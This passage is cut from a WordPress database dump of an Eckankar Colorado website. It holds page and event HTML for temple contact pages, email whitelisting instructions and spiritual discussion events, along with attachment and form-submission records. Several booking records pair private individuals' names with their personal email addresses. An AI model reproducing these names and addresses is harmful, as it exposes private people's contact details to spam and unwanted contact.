0px; padding-bottom: 0px; border-width: 0px; background-color: #f2f3f4;\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\" style=\"border-width: 0px;\">\n<h2 class=\"\" style=\"border-width: 0px; text-transform: none; color: #1d5791; text-align: center; font-size: 25px; font-family: \'Open Sans\'; font-weight: 400; margin-bottom: 20px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">For information or to have a Colorado Springs representative<br>\ncontact you, just fill out the form below.</h2>\n<div class=\"row bg-editor-hr-wrap\" style=\"border-width: 0px; margin-top: -15px;\">\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\n<div>\n<hr class=\"bg-hr-2 bg-hr\" style=\"margin: 12px auto 18px; color: #23507d; padding: 0px; width: 60%;\" width=\"50%\"></div>\n</div>\n</div>\n<p class=\"\" style=\"text-align: center;\">[ninja_form id=35]</p>\n</div>\n</div>\n</div>\n</div>\n</div>','New Colorado Springs Location Page -working','','draft','closed','closed','','','','','2023-04-05 10:18:05','2023-04-05 16:18:05','',0,'https://eckankar-colorado.org/?post_type=bg_block&#038;p=268298',0,'bg_block','',0),(268313,2,'2023-04-04 20:32:20','2023-04-05 02:32:20','','co-springs-location-2023-v5','','inherit','closed','closed','','co-springs-location-2023-v5','','','2023-04-04 20:32:20','2023-04-05 02:32:20','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/03/co-springs-location-2023-v5.jpg',0,'attachment','image/jpeg',0),(268349,2,'2023-04-05 10:08:48','0000-00-00 00:00:00','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\" style=\"padding-top: 36px; padding-bottom: 14px; border-width: 0px; background-color: #f2f3f4;\">\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-6\" style=\"border-width: 0px;\">\n<h1 class=\"\" style=\"text-transform: capitalize; font-size: 33px; text-align: left; margin-top: 11px; font-weight: 400; margin-bottom: 0px; border-width: 0px; color: #1d5791;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">ECK Temple of Colorado</h1>\n<h4 class=\"\" style=\"font-size: 19px; font-weight: 600; line-height: 14px; border-width: 0px; font-family: \'Open Sans\'; margin-top: 25px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Master your spiritual destiny.</h4>\n<p class=\"\" style=\"font-size: 18px; line-height: 23px; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Find love, happiness, and balance in life.</p>\n<h2 class=\"\" style=\"font-size: 19px; text-transform: capitalize; font-family: Open Sans; font-weight: 400; line-height: 19px; border-width: 0px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Phone:</strong> 303-756-9287</h2>\n<h2 class=\"\" style=\"font-size: 19px; text-transform: capitalize; line-height: 30px; font-family: \'Open Sans\'; font-weight: 400; margin-bottom: 10px; border-width: 0px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>ECK Temple Hours:<br>\n</strong><em>Open during in-person events</em></h2>\n<p class=\"\" style=\"margin-top: 36px; border-width: 0px;\"><a class=\"btn btn-color-1 btn-rounded btn-raised\" style=\"font-size: 17px; border-width: 0px; padding-left: 10px; padding-right: 10px;\" href=\"https://eckankar-colorado.org/central-colorado-public-calendar-mec/\">Check The Central Colorado Event Calendar</a></p>\n<p class=\"\">&nbsp;</p>\n</div>\n<div class=\"col-lg-6 col-md-6 col-sm-12 col-xs-12\">\n<p class=\"\" style=\"margin-top: 11px;\"><img class=\"bg-img bg-img-rounded-bottom-right bg-img-rounded-top-left aligncenter wp-image-263190 size-full\" style=\"box-shadow: #bfbfbf 10px 10px 3px -3px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2021/01/eck-temple-co-nd-2.jpg\" alt=\"\" width=\"555\" height=\"323\"></p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section bg-background-color color1-background-color color-1-text-contrast\">\n<div class=\"container\">\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 9px; border-width: 0px; background-color: rgba(253, 235, 221, 0.76); box-shadow: rgba(17, 17, 26, 0.1) 0px 0px 16px; clip-path: inset(-10px -0px -10px -0px); border: solid bisque 2px;\">\n<div class=\"col-md-6 col-sm-6 col-xs-12 col-lg-12\">\n<p class=\"\" style=\"font-weight: 600; font-size: 19px; padding: 0px 0px 10px; margin-bottom: 0px; color: #1d5791; border-width: 0px; text-align: center;\" data-font-weight=\"600\"><a class=\"\" style=\"font-size: 19px; font-family: Open Sans; font-weight: 400; border-width: 0px;\" href=\"https://eckankar-colorado.org/temple-gallery/\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"> Enjoy The ECK Temple of Colorado Photo Gallery&nbsp; </a><i class=\"fa fa-file-image-o fa-2x\" style=\"color: #f28a27; padding-top: 7px;\"></i></p>\n</div>\n</div>\n</div>\n<div class=\"tmpl-contact-5 boldgrid-section dynamic-gridblock color1-background-color color-1-text-contrast bg-background-color\">\n<div class=\"container\">\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 27px; border-width: 0px;\">\n<div class=\"col-md-12 col-sm-12 col-xs-12 bg-box-flush col-lg-12\">\n<p class=\"boldgrid-google-maps\" style=\"margin: 0px auto;\"><br>\n<iframe style=\"width: 100%;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d4341.54923330921!2d-105.07802898867396!3d39.69607762990276!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x876b80e32b510869%3A0xf49d311c529e5085!2s7100%20W%20Mississippi%20Ave%2C%20Lakewood%2C%20CO%2080226!5e0!3m2!1sen!2sus!4v1570147961441!5m2!1sen!2sus\" width=\"2000\" height=\"325\" frameborder=\"0\"></iframe></p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\"></div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 0px; border-width: 0px; background-color: #f2f3f4;\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\" style=\"border-width: 0px;\">\n<h2 class=\"\" style=\"border-width: 0px; text-transform: none; color: #1d5791; text-align: center; font-size: 25px; font-family: \'Open Sans\'; font-weight: 400; margin-bottom: 20px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">For information or to have a Central Colorado representative<br>\ncontact you, just fill out the form below.</h2>\n<div class=\"row bg-editor-hr-wrap\" style=\"border-width: 0px; margin-top: -15px;\">\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\n<div>\n<hr class=\"bg-hr-2 bg-hr\" style=\"margin: 12px auto 18px; color: #23507d; padding: 0px; width: 60%;\" width=\"50%\"></div>\n</div>\n</div>\n<p class=\"\" style=\"text-align: center;\">[ninja_form id=13]</p>\n</div>\n</div>\n</div>\n</div>\n</div>','temple new contact page working','','draft','closed','closed','','','','','2023-04-05 10:08:48','2023-04-05 16:08:48','',0,'https://eckankar-colorado.org/?post_type=bg_block&#038;p=268349',0,'bg_block','',0),(268375,1000020,'2023-04-09 10:30:00','2023-04-09 16:30:00','','Joanne - joanna3064@gmail.com','','publish','closed','closed','','joanne-joanna3064gmail-com-2','','','2023-04-09 10:30:00','2023-04-09 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268375',0,'mec-books','',0),(268379,0,'2023-04-08 15:49:46','2023-04-08 21:49:46','','','','publish','closed','closed','','268379','','','2023-04-08 15:49:46','2023-04-08 21:49:46','',0,'https://eckankar-colorado.org/nf_sub/268379/',0,'nf_sub','',0),(268382,1000079,'2023-04-09 10:30:00','2023-04-09 16:30:00','','Roger Morandi - utah.eckpres@gmail.com','','publish','closed','closed','','roger-morandi-utah-eckpresgmail-com','','','2023-04-09 10:30:00','2023-04-09 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268382',0,'mec-books','',0),(268383,1000023,'2023-04-09 10:30:00','2023-04-09 16:30:00','','Bonnie G. - bngstreet@gmail.com','','publish','closed','closed','','bonnie-g-bngstreetgmail-com-4','','','2023-04-09 10:30:00','2023-04-09 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268383',0,'mec-books','',0),(268384,1000080,'2023-04-09 10:30:00','2023-04-09 16:30:00','','Cindy Mason - c.lotusheart@icloud.com','','publish','closed','closed','','cindy-mason-c-lotushearticloud-com','','','2023-04-09 10:30:00','2023-04-09 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268384',0,'mec-books','',0),(268385,1000047,'2023-04-09 10:30:00','2023-04-09 16:30:00','','Beth Massengale - beth1848@yahoo.com','','publish','closed','closed','','beth-massengale-beth1848yahoo-com','','','2023-04-09 10:30:00','2023-04-09 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=268385',0,'mec-books','',0),(268386,1000081,'2023-04-09 10:30:00','2023-04-09 16:30:00','','Eileen Joy - eileenjoy12@gmail.com','','publish','closed','closed','','eileen-joy-eileenjoy12gmail-com','','','2023-04-09 10:30:00','2023-04-09 16:30:00','',0,'https://eckankar-colorado.org/mec-books/eileen-joy-eileenjoy12gmail-com/',0,'mec-books','',0),(268399,2,'2023-04-21 13:32:04','2023-04-21 19:32:04','<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-gallery-10 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 75px; padding-bottom: 20px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<p class=\"\" style=\"text-align: center;\"><img class=\"alignnone wp-image-267865 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/email-whitelist-2.jpg\" alt=\"\" width=\"1080\" height=\"427\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 16px; padding-bottom: 33px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<p class=\"h1\" style=\"text-align: center; text-transform: capitalize; border-width: 0px; color: rgba(62, 62, 62, 0.9); font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><span style=\"color: #1d5791;\">Not Receiving Emails From Colorado Eckankar?</span></p>\r\n<p class=\"\" style=\"border-width: 0px; text-align: center; color: #333333; font-size: 20px;\">We recommend that you whitelist our domain in your email account. Whitelisting us, or adding us to your safe sender list will ensure that your email provider doesn\'t block any emails that come from us!</p>\r\n<div class=\"row bg-editor-hr-wrap\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<div>\r\n<hr class=\"bg-hr\" style=\"border: 2px solid; margin-right: auto; margin-left: auto; color: #23507d;\" width=\"75%\"></div>\r\n</div>\r\n</div>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">After we send you an email, it must pass through several spam checking procedures that are controlled by your email provider. Email providers have developed extensive spam filtering techniques to monitor all emails in an effort to keep the recipients inbox free from spam.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">However, these filtering methods used by Gmail, Yahoo, Outlook, etc., often mistakenly block legitimate messages and may route them to your spam folder or not deliver them at all. By whitelisting our ECKANKAR email addresses or domain, your email provider will see that these messages are important to you and they should be delivered to your inbox.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 19px; font-weight: 500; font-family: \'Open Sans\';\" data-font-weight=\"500\" data-font-family=\"Open Sans\" data-font-style=\"\">Please find your email provider from the list below to see instructions on how to whitelist emails from Eckankar in Colorado.</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 60px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<p class=\"\" style=\"border-width: 0px;\">[WPSM_AC id=267776]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Email Whitelisting','','publish','closed','closed','','email-whitelisting','','','2023-04-21 13:53:09','2023-04-21 19:53:09','',0,'https://eckankar-colorado.org/?page_id=268399',0,'page','',0),(268406,2,'2023-04-23 15:11:08','2023-04-23 21:11:08','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">Problems. Problems. Who needs ’em? Well, actually, there are a number of good reasons why we do.</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 16pt;\">This three part spiritual discussion is open to all and based on the booklet <em>ECK Wisdom on Solving Problems</em>&nbsp; by Harold Klemp.</span></p>\r\n<p class=\"\"><span style=\"font-size: 16pt;\">Learn creative, time-tested techniques to</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\">Find the root cause of a problem</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Change your viewpoint and overcome difficulties</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Conquer your fears</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Work beyond symptoms to solutions</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Kindle your creativity</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Master your karma, past and present</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Receive spiritual guidance that can transform the way you see yourself and your life</span>.&nbsp;&nbsp;</li>\r\n</ul>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">These small booklets are available at the Colorado Springs Center. They can also be purchased from the <a href=\"https://www.eckbooks.org/items/ECK_Wisdom_on_Solving_Problems-1937-3.html\" target=\"_blank\" rel=\"noopener\">ECK Book Store</a>, or <a href=\"https://www.amazon.com/Wisdom-Solving-Problems-Harold-Klemp-ebook/dp/B08LNVJGRZ\">Amazon</a>.</span></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','ECK Wisdom on Solving Problems','','publish','closed','closed','','eck-wisdom-on-solving-problemsbook-discussion-in-person','','','2023-06-20 13:33:09','2023-06-20 19:33:09','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268406',0,'mec-events','',0),(268407,2,'2023-04-23 15:06:39','2023-04-23 21:06:39','','eck-wisdom-solving-probs','','inherit','closed','closed','','eck-wisdom-solving-probs','','','2023-04-23 15:06:39','2023-04-23 21:06:39','',268406,'https://eckankar-colorado.org/wp-content/uploads/2023/04/eck-wisdom-solving-probs.jpg',0,'attachment','image/jpeg',0),(268410,2,'2023-04-23 15:40:44','2023-04-23 21:40:44','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 18pt;\"><strong>Learn How Past Lives and Reincarnation Affect You Today</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The Colorado Springs ECK Center will be live-streaming the May 14th \'ECK Light and Sound Service\'. The program will be shown on a large TV for all to enjoy. </span><span style=\"font-size: 14pt;\">You are warmly invited to join us for this in person event.</span></p>\r\n<ul class=\"\">\r\n	<li><strong><span style=\"font-size: 14pt;\">Do you ever wonder if you’ve had a past life with a loved one?</span></strong></li>\r\n	<li><strong><span style=\"font-size: 14pt;\">Do you wish you could change some of the relationship patterns in your family?</span></strong></li>\r\n	<li><strong><span style=\"font-size: 14pt;\">Are you interested in techniques to help you remember past lives?</span></strong></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">If you’re ready to explore the past and see what lessons it holds for you and your family today, then this \'Light and Sound\' event is for you.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You have lived before. Lessons from past lives helped you get to where you are today. Your family, your coworkers, your virtues, and shortcomings all have roots in distant lives. Unlocking memories and lessons can help you sort through problems, grow your relationships, and move forward in life with more love and confidence.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Harold Klemp says in his book <em>ECK Wisdom on Karma and Reincarnation</em></span></p>\r\n<blockquote class=\"bg-blockquote border\" style=\"border-color: #954a00; margin-top: -15px; margin-left: 20px;\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"> \"Sometimes there\'s a strong bond between people and their pets, or a bond with certain other people. And we wonder, <em>Why such a strong bond?</em></span><br>\r\n<span style=\"font-size: 14pt;\">Often the answer lies in a past life.<br>\r\n</span><br>\r\n<span style=\"font-size: 14pt;\">\"If we had the ability--through a dream experience, Soul Travel, or the intuitive powers of Soul--to understand this connection between that Soul and ourselves, it would clear up so many things. It would let us treat other people with more love and kindness, because we\'d have an insight into our relationship with them.\"</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You will hear inspiring spiritual stories, experience the HU chant, a love song to God, and be able to speak with other like-hearted spiritual seekers in a low-key, no pressure setting. Please come and explore your own answers with open hearts, eyes and ears.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Welcome to All.</span></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Live Streaming Event - ECK Light and Sound Service<br>\'Past Lives and Present Relationships\'- In Person','','publish','closed','closed','','elss-streaming-eventpast-lives-and-present-relationshipseck-light-and-sound-service-in-person-online','','','2023-04-25 15:16:25','2023-04-25 21:16:25','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268410',0,'mec-events','',0),(268750,2,'2023-06-30 14:22:32','2023-06-30 20:22:32','','2023-Reg-SA-6','','inherit','closed','closed','','2023-reg-sa-6','','','2023-06-30 14:22:32','2023-06-30 20:22:32','',268736,'https://eckankar-colorado.org/wp-content/uploads/2023/06/2023-Reg-SA-6.jpg',0,'attachment','image/jpeg',0),(268751,2,'2023-06-30 15:58:33','2023-06-30 21:58:33','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\"><span style=\"font-size: 18pt; color: #eb9809;\">Video and Spiritual Discussion.</span> <br>\r\n</span></strong></p>\r\n<p><span style=\"font-size: 14pt;\">Please join us for a Spiritual Discussion followed by a 30 minute video of Sri Harold Klemp, the Spiritual Leader of Eckankar.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Video presentations of Sri Harold Klemp offer a unique opportunity to hear stories and spiritual insights that bring meaning, connection, and humor to the workings of Spirit in our everyday lives.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">All are warmly welcome.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','God\'s Love is a Wonderful Thing','','publish','closed','closed','','gods-love-is-a-wonderful-thing','','','2023-06-30 15:59:50','2023-06-30 21:59:50','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268751',0,'mec-events','',0),(268687,0,'2023-06-24 21:49:25','2023-06-25 03:49:25','','','','publish','closed','closed','','268687','','','2023-06-24 21:49:25','2023-06-25 03:49:25','',0,'https://eckankar-colorado.org/nf_sub/268687/',0,'nf_sub','',0),(269203,0,'2023-10-13 01:31:19','2023-10-13 07:31:19','','','','publish','closed','closed','','269203','','','2023-10-13 01:31:19','2023-10-13 07:31:19','',0,'https://eckankar-colorado.org/nf_sub/269203/',0,'nf_sub','',0),(269204,0,'2023-10-13 15:40:46','2023-10-13 21:40:46','','','','publish','closed','closed','','269204','','','2023-10-13 15:40:46','2023-10-13 21:40:46','',0,'https://eckankar-colorado.org/nf_sub/269204/',0,'nf_sub','',0),(269205,0,'2023-10-13 18:01:29','2023-10-14 00:01:29','','','','publish','closed','closed','','269205','','','2023-10-13 18:01:29','2023-10-14 00:01:29','',0,'https://eckankar-colorado.org/nf_sub/269205/',0,'nf_sub','',0),(268415,2,'2023-04-23 17:22:27','2023-04-23 23:22:27','','setting-sun-river-3','','inherit','closed','closed','','setting-sun-river-3','','','2023-04-23 17:22:27','2023-04-23 23:22:27','',268410,'https://eckankar-colorado.org/wp-content/uploads/2023/04/setting-sun-river-3.jpg',0,'attachment','image/jpeg',0),(268416,15,'2023-04-23 17:28:20','2023-04-23 23:28:20','','GoldenStar','','inherit','closed','closed','','goldenstar','','','2023-04-23 17:28:20','2023-04-23 23:28:20','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/04/GoldenStar.webp',0,'attachment','image/webp',0),(269043,2,'2023-09-12 11:04:36','2023-09-12 17:04:36','','fall-bridge-over-water-1','','inherit','closed','closed','','fall-bridge-over-water-1','','','2023-09-12 11:04:36','2023-09-12 17:04:36','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/09/fall-bridge-over-water-1.jpg',0,'attachment','image/jpeg',0),(269163,1000021,'2023-10-08 10:30:00','2023-10-08 16:30:00','','Tad - choll.03@comcast.net','','publish','closed','closed','','tad-choll-03comcast-net','','','2023-10-08 10:30:00','2023-10-08 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=269163',0,'mec-books','',0),(269164,1000021,'2023-10-08 10:30:00','2023-10-08 16:30:00','','Test2 - choll.03@comcast.net','','publish','closed','closed','','test2-choll-03comcast-net','','','2023-10-08 10:30:00','2023-10-08 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=269164',0,'mec-books','',0),(269177,1000093,'2023-10-08 10:30:00','2023-10-08 16:30:00','','Lynn - lynnschultept@gmail.com','','publish','closed','closed','','lynn-lynnschulteptgmail-com','','','2023-10-08 10:30:00','2023-10-08 16:30:00','',0,'https://eckankar-colorado.org/mec-books/lynn-lynnschulteptgmail-com/',0,'mec-books','',0),(269178,0,'2023-10-08 11:31:44','2023-10-08 17:31:44','','','','publish','closed','closed','','269178','','','2023-10-08 11:31:44','2023-10-08 17:31:44','',0,'https://eckankar-colorado.org/nf_sub/269178/',0,'nf_sub','',0),(269179,0,'2023-10-09 00:02:37','2023-10-09 06:02:37','','','','publish','closed','closed','','269179','','','2023-10-09 00:02:37','2023-10-09 06:02:37','',0,'https://eckankar-colorado.org/nf_sub/269179/',0,'nf_sub','',0),(269180,0,'2023-10-09 08:28:39','2023-10-09 14:28:39','','','','publish','closed','closed','','269180','','','2023-10-09 08:28:39','2023-10-09 14:28:39','',0,'https://eckankar-colorado.org/nf_sub/269180/',0,'nf_sub','',0),(269181,0,'2023-10-09 09:26:53','2023-10-09 15:26:53','','','','publish','closed','closed','','269181','','','2023-10-09 09:26:53','2023-10-09 15:26:53','',0,'https://eckankar-colorado.org/nf_sub/269181/',0,'nf_sub','',0),(269182,0,'2023-10-09 12:16:29','2023-10-09 18:16:29','','','','publish','closed','closed','','269182','','','2023-10-09 12:16:29','2023-10-09 18:16:29','',0,'https://eckankar-colorado.org/nf_sub/269182/',0,'nf_sub','',0),(269183,0,'2023-10-09 12:17:05','2023-10-09 18:17:05','','','','publish','closed','closed','','269183','','','2023-10-09 12:17:05','2023-10-09 18:17:05','',0,'https://eckankar-colorado.org/nf_sub/269183/',0,'nf_sub','',0),(269184,2,'2023-10-09 13:00:50','2023-10-09 19:00:50','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\" style=\"line-height: 32px;\"><span style=\"font-size: 20pt;\"><strong><span class=\"\" style=\"color: #ad7f14;\">Discover HU, Ancient Mantra and Sacred Sound.<br>\r\n</span></strong></span><span style=\"font-size: 18pt;\">You’re invited to experience chanting <strong>HU</strong>, contemplative time, and spiritual conversation with others of like heart.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The program experience includes a personal introduction by the facilitator, the reading of a short ECK quote, singing HU for 15 to 20 minutes, and ends with a silent contemplation for a few minutes. HU is an ancient name for God that has been sung for thousands of years in many lands for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life. Here are some of the many benefits of HU:</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Stay afterward for spiritual discussion, light refreshments and fellowship.</span></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Sparkplug to Spiritual Growth','','publish','closed','closed','','sparkplug-to-spiritual-growth','','','2023-10-09 13:01:44','2023-10-09 19:01:44','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=269184',0,'mec-events','',0),(268418,15,'2023-04-23 17:37:13','2023-04-23 23:37:13','','BlueStarFamily','','inherit','closed','closed','','bluestarfamily','','','2023-04-23 17:37:13','2023-04-23 23:37:13','',0,'https://eckankar-colorado.org/wp-content/uploads/2023/04/BlueStarFamily.webp',0,'attachment','image/webp',0),(269162,0,'2023-10-03 17:48:32','2023-10-03 23:48:32','','','','publish','closed','closed','','269162','','','2023-10-03 17:48:32','2023-10-03 23:48:32','',0,'https://eckankar-colorado.org/nf_sub/269162/',0,'nf_sub','',0),(268419,15,'2023-04-23 17:49:50','2023-04-23 23:49:50','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\"><strong>PAST LIVES</strong>&nbsp;- learn to recall memories of past lives. Lessons of long ago can be recaptured now to help our lives today.</span></li>\r\n	<li><span style=\"font-size: 14pt;\"><strong>DREAMS</strong>&nbsp;- Dreams are real, another way to find wisdom from the heart. Dreams open new avenues of truth and give insights just for you.</span></li>\r\n	<li><span style=\"font-size: 14pt;\"><strong>SOUL TRAVEL</strong>&nbsp;- Learn to shift your consciousness to allow you to tap into the wisdom and knowledge of your own inner worlds. To fully, consciously ride the wave of divine love coming into our lives every day.</span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">All are welcome to join us in a 6-month spiritual discussion on past lives, dreams, and soul travel. We will meet on the 2nd Wednesday of the month at 6:30pm at the Parker Public Library. Free books will be available and there is no need to have the books ahead of time. You can join one of the classes or all of them.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The plan is to focus on a different aspect of these topics each month:</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">May 10 - You Have Lived Before - Remembering Past Lives</span><br>\r\n<span style=\"font-size: 14pt;\">June 14 - Past Lives, Present Lessons</span><br>\r\n<span style=\"font-size: 14pt;\">July 12 - Your Source for Everyday Guidance: A Spiritual View of Dreams</span><br>\r\n<span style=\"font-size: 14pt;\">August 9 - Gaining Insights through Spiritual Dream Exploration</span><br>\r\n<span style=\"font-size: 14pt;\">September 13 - Soul Travel: Learn to Shift Your Consciousness for a Better Life</span><br>\r\n<span style=\"font-size: 14pt;\">October 11 - Beyond Soul Travel: Being, Knowing, and Seeing</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"bg-white rounded-lg\">\r\n<div class=\"p-5\">\r\n<div class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures</strong></span></div>\r\n<div class=\"\">\r\n<div><span class=\"\" style=\"font-size: 12pt;\"><strong>**</strong><em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-parker/events/293053261/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Past Lives Dreams and Soul Travel Discussion<br>In Person Discussion','','publish','closed','closed','','past-lives-dreams-and-soul-travel-discussionin-person-discussion','','','2023-04-23 17:49:50','2023-04-23 23:49:50','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268419',0,'mec-events','',0),(268420,15,'2023-04-23 